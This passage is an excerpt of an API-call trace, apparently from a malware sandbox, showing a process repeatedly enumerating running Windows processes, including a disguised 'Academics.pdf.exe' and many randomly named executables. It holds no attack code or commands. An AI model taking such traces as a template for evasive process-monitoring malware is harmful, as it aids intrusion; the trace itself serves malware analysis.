cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0312.932] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.933] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0312.934] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.934] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0312.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0312.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0312.947] CloseHandle (hObject=0x294) returned 1 [0312.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0312.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0312.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0312.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0312.948] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0312.948] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0312.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0312.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0312.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0312.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0312.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0312.950] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0312.952] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0312.953] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0312.953] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0312.954] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0312.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0312.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0312.957] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0312.957] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0312.958] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.959] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.960] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.961] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.961] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.962] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0312.963] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.964] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.965] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0312.965] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0312.966] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0312.967] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0312.977] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0312.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0312.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0312.980] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0312.981] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0312.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0312.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0312.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0312.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0312.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0312.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0312.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0312.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0312.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0312.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0312.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0312.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0312.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0312.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0312.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0312.996] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0312.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0312.998] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0312.999] CloseHandle (hObject=0x294) returned 1 [0312.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0312.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0312.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0312.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0312.999] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0312.999] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0313.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0313.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0313.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0313.001] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.002] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0313.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0313.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0313.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0313.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0313.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0313.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0313.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0313.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0313.014] Process32NextW (in: 